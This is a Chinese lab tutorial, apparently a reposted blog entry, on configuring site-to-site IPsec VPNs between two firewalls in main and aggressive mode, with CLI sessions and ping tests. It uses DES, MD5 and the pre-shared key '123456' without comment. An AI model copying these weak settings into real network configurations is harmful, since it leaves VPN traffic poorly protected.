IPSEC技术应用
isakmp模式

F1配置:
[f1]inter eth0/0
[f1-Ethernet0/0]ip address 192.168.1.254 24
[f1-Ethernet0/0]loopback
[f1-Ethernet0/0]inter eth0/1
[f1-Ethernet0/1]ip address 1.1.1.1 24
[f1-Ethernet0/1]quit
[f1]ip route 0.0.0.0 0 1.1.1.2做路由
加区域:
[f1]fire zone trust
[f1-zone-trust]add inter eth0/0
[f1-zone-trust]quit
[f1]fire zone untrust
[f1-zone-untrust]add inter eth0/1
制做控制列表:
[f1]acl num 3000
[f1-acl-adv-3000]rule 10 permit ip source 192.168.1.0 0.0.0.255 dest 192.168.2.0 0.0.0.255
[f1-acl-adv-3000]rule 20 deny ip source any dest any
[f1-acl-adv-3000]quit
做安全提议:
[f1]ipsec proposal tran1安全提议名字
[f1-ipsec-proposal-tran1]?
Ipsec-proposal view commands:
display Display current system information
encapsulation-mode Specify the packet encapsulation mode
esp Specify the ESP protocol(RFC2406) parameters
nslookup Query Internet name servers
ping Ping function
quit Exit from current command view
return Exit to User View
save Save current configuration
tracert Trace route function
transform Specify the security protocol(s) used to transform the
packet
undo Cancel current setting
vrbd Show application version
[f1-ipsec-proposal-tran1]encap ?
transport Only the payload of IP packet is protected(transport mode)
tunnel The entire IP packet is protected(tunnel mode)
[f1-ipsec-proposal-tran1]encap tunnel 制定安全协议报文封装模式(隧道)
[f1-ipsec-proposal-tran1]transform ?
ah AH protocol defined in RFC2402
ah-esp ESP protocol first, then AH protocol
esp ESP protocol defined in RFC2406
[f1-ipsec-proposal-tran1]transform esp 制定对报文进行安全转换的安全协议(esp)
[f1-ipsec-proposal-tran1]esp encry des 加密算法类型
[f1-ipsec-proposal-tran1]esp auth md5 验证算法类型
[f1-ipsec-proposal-tran1]quit
建立邻居:
[f1]ike peer f2
共享密钥:
[f1-ike-peer-f2]pre-shared-key simple 123456
目的:
[f1-ike-peer-f2]remote-address 1.1.2.1
制作安全策略:
[f1]ipsec policy policy1 10 isakmp
[f1-ipsec-policy-isakmp-policy1-10]security acl 3000
[f1-ipsec-policy-isakmp-policy1-10]proposal tran1
建立邻居
[f1-ipsec-policy-isakmp-policy1-10]ike-peer f2
应用到接口:
[f1]inter eth0/1
[f1-Ethernet0/1]ipsec policy policy1
配置f2:
[f2]inter eth0/0
[f2-Ethernet0/0]ip address 192.168.2.254 24
[f2-Ethernet0/0]inter eth0/1
[f2-Ethernet0/1]ip address 1.1.2.1 24
[f2-Ethernet0/1]quit
[f2]ip route 0.0.0.0 0 1.1.2.2
[f2]fire pack defau permi
[f2]fire zone trust
[f2-zone-trust]add inter eth0/0
The interface has been added to trust security zone.
[f2-zone-trust]quit
[f2]fire zone untrust
[f2-zone-untrust]add inter eth0/1
[f2-zone-untrust]quit
[f2]acl num 3000
[f2-acl-adv-3000]rule 10 permit ip source 192.168.2.0 0.0.0.255 dest 192.168.1.0 0.0.0.255
[f2-acl-adv-3000]rule 20 deny ip source any dest any
[f2-acl-adv-3000]quit
[f2]ipsec proposal tran1
[f2-ipsec-proposal-tran1]encap tunnel
[f2-ipsec-proposal-tran1]transform esp
[f2-ipsec-proposal-tran1]esp encry des
[f2-ipsec-proposal-tran1]esp auth md5
[f2-ipsec-proposal-tran1]quit
建立邻居:
[f2]ike peer f1
[f2-ike-peer-f1]pre-share?
pre-shared-key
[f2-ike-peer-f1]pre-shared-key 123456
[f2-ike-peer-f1]remote-address 1.1.1.1
做策略:
[f2]ipsec policy policy1 10 isakmp
[f2-ipsec-policy-isakmp-policy1-10]security acl 3000
[f2-ipsec-policy-isakmp-policy1-10]proposal tran1
[f2-ipsec-policy-isakmp-policy1-10]ike-peer f1
[f2-ipsec-policy-isakmp-policy1-10]quit
[f2]inter eth0/1
[f2-Ethernet0/1]
[f2-Ethernet0/1]ipsec policy polict1
No such policy exists.
[f2-Ethernet0/1]ipsec policy policy1
配置交换机:
[Quidway]vlan 10
[Quidway-vlan10]port eth0/10
[Quidway-vlan10]ip address 1.1.1.2 255.255.255.0
^
% Unrecognized command found at '^' position.
[Quidway-vlan10]vlan 20
[Quidway-vlan20]port eth0/20
[Quidway]inter vlan 10
[Quidway-Vlan-interface10]
%Dec 14 10:30:20 2012 Quidway L2INF/5/VLANIF LINK STATUS CHANGE:
Vlan-interface10: turns into UP state
[Quidway-Vlan-interface10]ip address 1.1.1.2 255.255.255.0
[Quidway-Vlan-interface10]
%Dec 14 10:30:38 2012 Quidway IFNET/5/UPDOWN:Line protocol on the interface Vlan-interface10 turns into UP state
[Quidway-Vlan-interface10]inter vlan 20
[Quidway-Vlan-interface20]
%Dec 14 10:30:45 2012 Quidway L2INF/5/VLANIF LINK STATUS CHANGE:
Vlan-interface20: turns into UP state
[Quidway-Vlan-interface20]ip address 1.1.2.2 255.255.255.0
测试:
[f2]dis ip rout 查看路由表
Routing Table: public net
Destination/Mask Protocol Pre Cost        Nexthop         Interface
0.0.0.0/0 STATIC   60   0           1.1.2.2         Ethernet0/1
1.1.2.0/24 DIRECT   0    0           1.1.2.1         Ethernet0/1
1.1.2.1/32 DIRECT   0    0           127.0.0.1       InLoopBack0
127.0.0.0/8 DIRECT   0    0           127.0.0.1       InLoopBack0
127.0.0.1/32 DIRECT   0    0           127.0.0.1       InLoopBack0
192.168.2.0/24 DIRECT   0    0           192.168.2.254   Ethernet0/0
192.168.2.254/32 DIRECT   0    0           127.0.0.1       InLoopBack0
[f2]ping -a 192.168.2.254 192.168.1.254
PING 192.168.1.254: 56 data bytes, press CTRL_C to break
Request time out
Reply from 192.168.1.254: bytes=56 Sequence=2 ttl=255 time=17 ms
Reply from 192.168.1.254: bytes=56 Sequence=3 ttl=255 time=16 ms
Reply from 192.168.1.254: bytes=56 Sequence=4 ttl=255 time=16 ms
Reply from 192.168.1.254: bytes=56 Sequence=5 ttl=255 time=15 ms
--- 192.168.1.254 ping statistics ---
5 packet(s) transmitted
4 packet(s) received
20.00% packet loss
round-trip min/avg/max = 15/16/17 ms
野蛮模式
野蛮模式:
F1自动获得

配置f2:
[f2]inter eth0/0
[f2-Ethernet0/0]ip addres 192.168.2.254 24
[f2-Ethernet0/0]loopback
[f2-Ethernet0/0]inter eth0/1
[f2-Ethernet0/1]ip address 1.1.2.1 24
[f2]ip route 0.0.0.0 0 1.1.2.2
加区域:
[f2]firewall packet-filter default permit
[f2]firewall zone trust
[f2-zone-trust]add inter eth0/0
[f2]firewall zone untrust
[f2-zone-untrust]add inter eth0/1
做控制列表:
[f2]acl number 3000
[f2-acl-adv-3000]rule 10 permit ip source 192.168.2.0 0.0.0.255 dest 192.168.1.0 0.0.0.255
[f2-acl-adv-3000]rule 20 deny ip source any dest any
做安全提议:
[f2]ipsec proposal tran1
[f2-ipsec-proposal-tran1]encapsulation-mode tunnel
[f2-ipsec-proposal-tran1]transform esp
[f2-ipsec-proposal-tran1]esp encryption-algorithm des
[f2-ipsec-proposal-tran1]esp authentication-algorithm md5
做邻居;
[f2]ike peer f1
[f2-ike-peer-f1]?
Ike-peer 系统视图命令:
certificate 设置证书的参数
display 显示当前系统信息
dpd 配置peer的DPD
exchange-mode 指定IKE阶段一使用的协商模式
id-type 设置地址或名字作为ID
local 设置隧道本端子网类型
local-address 指定本端IP地址
nat 使用udp封装进行nat透传
nslookup 查询域名服务
peer 设置隧道对端子网类型
ping 检查网络连接或主机是否可达
pre-shared-key 指定预共享密钥
quit 退出当前的命令视图
remote-address 指定对端IP地址
remote-name 指定对端网关名
return 退到用户视图
save 保存当前有效配置
tracert 跟踪到达目的地的路由
undo 取消当前设置
vrbd 显示VRP版本
[f2-ike-peer-f1]exchange-mode ? 
aggressive 野蛮模式
main 主模式
[f2-ike-peer-f1]exchange-mode aggressive
[f2-ike-peer-f1]id-type name  设置名字作为id
[f2-ike-peer-f1]pre-shared-key simple 123456
[f2-ike-peer-f1]remote-name f1
[f2-ike-peer-f1]local-address 1.1.2.1
[f2]ike local-name f2
做策略:
[f2]ipsec policy policy1 10 isakmp
[f2-ipsec-policy-isakmp-policy1-10]security acl 3000
[f2-ipsec-policy-isakmp-policy1-10]proposal tran1
[f2-ipsec-policy-isakmp-policy1-10]ike-peer f1
应用:
[f2]inter eth0/1
[f2-Ethernet0/1]ipsec policy policy1
建立控制列表:
[f1]acl number 3000
[f1-acl-adv-3000]rule 10 permit ip source 192.168.1.0 0.0.0.255 dest 192.168.2.0 0.0.0.255
[f1-acl-adv-3000]rule 20 deny ip source any dest any
安全提议:
[f1]ipsec proposal tran1
[f1-ipsec-proposal-tran1]encap
[f1-ipsec-proposal-tran1]encapsulation-mode tunnel
[f1-ipsec-proposal-tran1]transform esp
[f1-ipsec-proposal-tran1]esp encry
[f1-ipsec-proposal-tran1]esp encryption-algorithm des
[f1-ipsec-proposal-tran1]esp auth 
[f1-ipsec-proposal-tran1]esp authentication-algorithm md5
建立邻居:
[f1]ike peer f2
[f1-ike-peer-f2]exchange-mode aggressive
[f1-ike-peer-f2]id-type name
[f1-ike-peer-f2]remote-address 1.1.2.1
[f1-ike-peer-f2]remote-name f2
密钥:
[f1-ike-peer-f2]pre-shared-key simple 123456
安全策略:
[f1-ike-peer-f2]quit
[f1]ipsec policy policy1 10 isakmp
[f1-ipsec-policy-isakmp-policy1-10]security acl 3000
[f1-ipsec-policy-isakmp-policy1-10]proposal tran1
[f1-ipsec-policy-isakmp-policy1-10]ike-peer f2
[f1-ipsec-policy-isakmp-policy1-10]quit
应用:
[f1]inter eth0/1
[f1-Ethernet0/1]ipsec policy policy1
设置接口为自动获得地址:
[f1]inter eth0/1
[f1-Ethernet0/1]ip ?
address 设置接口的IP地址
fast-forwarding 快转开关信息
policy 使能策略路由
relay 中继
urpf 单播反向路径查找功能
[f1-Ethernet0/1]ip address ?
X.X.X.X IP地址
bootp-alloc 使用BOOTP协商分配IP地址
dhcp-alloc 使用DHCP协商分配IP地址
[f1-Ethernet0/1]ip address dhcp-alloc
[f1-Ethernet0/1]
%2012/12/13 00:51:52:687 f1 IFNET/4/UPDOWN:链路协议在接口Ethernet0/1上状态变为UP
[f1]inter eth0/0
[f1-Ethernet0/0]ip address 192.168.1.254 24
[f1-Ethernet0/0]loopback
[f1]ip route 0.0.0.0 0 1.1.1.2
交换机配置:
[Quidway]vlan 10
[Quidway-vlan10]port eth0/10
[Quidway-vlan10]vlan 20
[Quidway-vlan20]port eth0/20
[Quidway-vlan20]quit
[Quidway]inter vlan 10
[Quidway-Vlan-interface10]ip address 1.1.1.2 255.255.255.0
[Quidway]inter vlan 20
[Quidway-Vlan-interface20]
%Dec 14 12:10:27 2012 Quidway L2INF/5/VLANIF LINK STATUS CHANGE:
Vlan-interface20: turns into UP state
[Quidway-Vlan-interface20]ip address 1.1.2.2 255.255.255.0
做dhcp服务器:
[Quidway]dhcp server ip-pool f1
[Quidway-dhcp-f1]network 1.1.1.0 mask 255.255.255.0
[Quidway-dhcp-f1]gateway-list 1.1.1.2
测试:
[f1]ping -a 192.168.1.254 192.168.2.254
PING 192.168.1.254: 56 data bytes, press CTRL_C to break
Request time out
Reply from 192.168.2.254: bytes=56 Sequence=2 ttl=255 time=17 ms
Reply from 192.168.2.254: bytes=56 Sequence=3 ttl=255 time=16 ms
Reply from 192.168.2.254: bytes=56 Sequence=4 ttl=255 time=16 ms
Reply from 192.168.2.254: bytes=56 Sequence=5 ttl=255 time=15 ms
--- 192.168.1.254 ping statistics ---
5 packet(s) transmitted
4 packet(s) received
20.00% packet loss
round-trip min/avg/max = 15/16/17 ms

转载于:https://blog.51cto.com/liufan0321/1089065

ipsec技术isakmp(动态)应用相关推荐

  1. IPsec技术介绍(转)

    目  录 IPsec IPsec简介 IPsec的协议实现 IPsec基本概念 加密卡 IPsec虚拟隧道接口 使用IPsec保护IPv6路由协议 IKE IKE简介 IKE的安全机制 IKE的交换过 ...

  2. 配置单臂路由、三层交换技术以及动态路由

    实验05:配置单臂路由 一. 实验目标 通过Cisco Packet Tracer来配置单臂路由. 二.实验环境和拓扑 window 7操作系统,Cisco Packet Tracer软件. 拓扑结构 ...

  3. jsp页面内引入静态html,JSP技术实现动态页面到静态页面的方法

    本文是介绍了jsp技术实现动态页面到静态页面的方法,分享给大家,具体如下: 对于JSP技术实现动态页面到静态页面的方案,我们从三个步骤来说明: JSP技术实现动态页面到静态页面的方案第一: 为了能深入 ...

  4. php 动态 控件,PHP技术在动态网页表单控件提取中的应用研究

    曲小纳 摘要:由于电子商务及网络信息技术的飞速发展,动态网站已经逐渐取代传统的静态网站,在不断向人工智能化等方向发展.该篇文章就针对PHP这种技术在动态网页表单控件提取中的应用进行详细的阐述. 关键词 ...

  5. 陷阱技术探秘──动态汉化Windows技术的分析

    四通利方(RichWin).中文之星(CStar)是大家广为熟知的汉化Windows产品,"陷阱"技术即动态修改Windows代码,一直是其对外宣称的过人技术.本文从Windows ...

  6. [DEV] 陷阱技术探秘 ──动态汉化Windows技术的分析

    "陷阱"技术探秘 ──动态汉化Windows技术的分析 四通利方(RichWin).中文之星(CStar)是大家广为熟知的汉化Windows产品,"陷阱"技术即 ...

  7. 陷阱技术探秘 ----动态汉化Windows技术的分析

    "陷阱"技术探秘 ──动态汉化Windows技术的分析 四通利方(RichWin).中文之星(CStar)是大家广为熟知的汉化Windows产品,"陷阱"技术即 ...

  8. 陷阱技术探秘 ──动态汉化Windows技术的分析

    "陷阱"技术探秘 ──动态汉化Windows技术的分析 四通利方(RichWin).中文之星(CStar)是大家广为熟知的汉化Windows产品,"陷阱"技术即 ...

  9. 用SVG技术实现动态图形输出的嵌入式Web服务

    摘   要  本文结合控制系统对嵌入式Web服务器的要求,分析了嵌入式Web服务器的基本原理.动态内容实现方法,并结合实例着重介绍了基于SVG技术实现动态图形输出的方法. 关键字  嵌入式系统  SV ...

最新文章

  1. 凝思系统改时间_国产操作系统往事:四十年激变,终再起风云
  2. winform Outlookbar
  3. python django开发工具_利用pyCharm编辑器创建Django项目开发环境-python开发工具第一篇...
  4. 【Java】时间的新旧比较
  5. C++语言基础 —— STL —— 容器与迭代器 —— bitset
  6. jpages中文api
  7. linux进入uvc目录,Linux uvc驱动分析
  8. 201612-1-中间数
  9. IOS开发之----四舍五入问题
  10. 内网SMTP发送失败的曲线救国之策
  11. PyQt(Python+Qt)学习随笔:clicked和clicked(bool)信号连接同名函数出现的问题
  12. 尝试Ajax数据爬取微博
  13. 用 java eclipse画出一个圆形并且可以控制半径大小
  14. CodeWars刷题练习
  15. 求助:大文件mp4恢复
  16. Dessert(dfs)
  17. 单片机入门学习笔记6:新唐单片机N76E003
  18. PKU C++课程期末编程题解答
  19. 十年风雨,一个普通程序员的成长之路(七)膨胀、骄傲,程序员转项目经理的原罪...
  20. 办公技巧 original 设置自适应画布,让图像大小跟图形保持一致

热门文章

  1. IT程序员必须知道的几个Git代码托管平台
  2. Clang Builtin函数格式说明
  3. python学习之xpath使用案例总结_xPath 用法总结整理
  4. android启动默认浏览器
  5. 淘宝官网订单API接口
  6. 英雄联盟一直连接服务器win10,Win10系统下玩lol提示“无法连接服务器”怎么解决?...
  7. ARM Cortex各系列处理器分类比较
  8. 杨森翔的书法-5.李白诗:早发白帝城
  9. 打印机常见六大故障的解决方法
  10. mock.js如何使用?简单易懂,一学就会,一篇文章即可出师